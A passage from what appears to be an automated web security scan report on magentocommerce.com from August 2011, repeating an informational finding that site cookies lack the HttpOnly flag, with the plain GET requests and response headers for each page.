Date: Fri, 12 Aug 2011 15:06:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175988; expires=Sat, 11-Aug-2012 15:06:28 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A67%3A%22%2Fmedia%2Fscreencasts%2Fintroducing-the-magento-enterprise-edition%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:28 GMT
Content-Length: 33321

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.90. http://www.magentocommerce.com/media/screencasts/landing-pages/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/landing-pages/view

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts/landing-pages/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176057; expires=Sat, 11-Aug-2012 15:07:37 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fmedia%2Fscreencasts%2Flanding-pages%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:37 GMT
Content-Length: 36261

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.91. http://www.magentocommerce.com/media/screencasts/permissions/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/permissions/view

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts/permissions/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176026; expires=Sat, 11-Aug-2012 15:07:06 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A36%3A%22%2Fmedia%2Fscreencasts%2Fpermissions%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:06 GMT
Content-Length: 35264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.92. http://www.magentocommerce.com/media/screencasts/private-sales-including-events-invitations-and-category-access-permissions/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/private-sales-including-events-invitations-and-category-access-permissions/view

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts/private-sales-including-events-invitations-and-category-access-permissions/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176006; expires=Sat, 11-Aug-2012 15:06:46 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A99%3A%22%2Fmedia%2Fscreencasts%2Fprivate-sales-including-events-invitations-and-category-access-permissions%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:46 GMT
Content-Length: 33592

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.93. http://www.magentocommerce.com/media/screencasts/product-comparison/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/product-comparison/view

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts/product-comparison/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176058; expires=Sat, 11-Aug-2012 15:07:38 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A43%3A%22%2Fmedia%2Fscreencasts%2Fproduct-comparison%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:38 GMT
Content-Length: 33268

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.94. http://www.magentocommerce.com/media/screencasts/single-page-checkout-guest-checkout/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/single-page-checkout-guest-checkout/view

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts/single-page-checkout-guest-checkout/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176174; expires=Sat, 11-Aug-2012 15:09:34 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A60%3A%22%2Fmedia%2Fscreencasts%2Fsingle-page-checkout-guest-checkout%2Fview%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:34 GMT
Content-Length: 34173

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.95. http://www.magentocommerce.com/media/screencasts/static-blocks/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/static-blocks/view

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts/static-blocks/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:51 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176010; expires=Sat, 11-Aug-2012 15:06:50 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fmedia%2Fscreencasts%2Fstatic-blocks%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:51 GMT
Content-Length: 34297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.96. http://www.magentocommerce.com/media/screencasts/transactional-email/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/transactional-email/view

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts/transactional-email/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176037; expires=Sat, 11-Aug-2012 15:07:17 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A44%3A%22%2Fmedia%2Fscreencasts%2Ftransactional-email%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:18 GMT
Content-Length: 34426

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.97. http://www.magentocommerce.com/media/screencasts/upsells/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/upsells/view

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts/upsells/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176165; expires=Sat, 11-Aug-2012 15:09:25 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fmedia%2Fscreencasts%2Fupsells%2Fview%2F%22%3Bi%3A1%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A4%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:25 GMT
Content-Length: 33171

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.98. http://www.magentocommerce.com/media/screencasts/working-with-paypal/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/working-with-paypal/view

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts/working-with-paypal/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176036; expires=Sat, 11-Aug-2012 15:07:16 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A44%3A%22%2Fmedia%2Fscreencasts%2Fworking-with-paypal%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:16 GMT
Content-Length: 40839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.99. http://www.magentocommerce.com/media/screenshots  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screenshots

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screenshots HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175862; expires=Sat, 11-Aug-2012 15:04:22 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fmedia%2Fscreenshots%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:22 GMT
Content-Length: 36191

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.100. http://www.magentocommerce.com/media/videos  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/videos

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/videos HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175890; expires=Sat, 11-Aug-2012 15:04:50 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fmedia%2Fvideos%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:50 GMT
Content-Length: 37445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.101. http://www.magentocommerce.com/media/videos/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/videos/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/videos/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:48 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176188; expires=Sat, 11-Aug-2012 15:09:48 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fmedia%2Fvideos%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:48 GMT
Content-Length: 37445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.102. http://www.magentocommerce.com/media/webinars  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/webinars

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/webinars HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175869; expires=Sat, 11-Aug-2012 15:04:29 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fmedia%2Fwebinars%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:30 GMT
Content-Length: 178679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.103. http://www.magentocommerce.com/media/webinars/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/webinars/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/webinars/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175893; expires=Sat, 11-Aug-2012 15:04:53 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fmedia%2Fwebinars%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:54 GMT
Content-Length: 178679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.104. http://www.magentocommerce.com/partners/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /partners/ HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/services/descriptions#core-principles-for-theming-in-magento
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170940; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A1%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A2%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fmedia%2Fscreencasts%2F%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.9.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
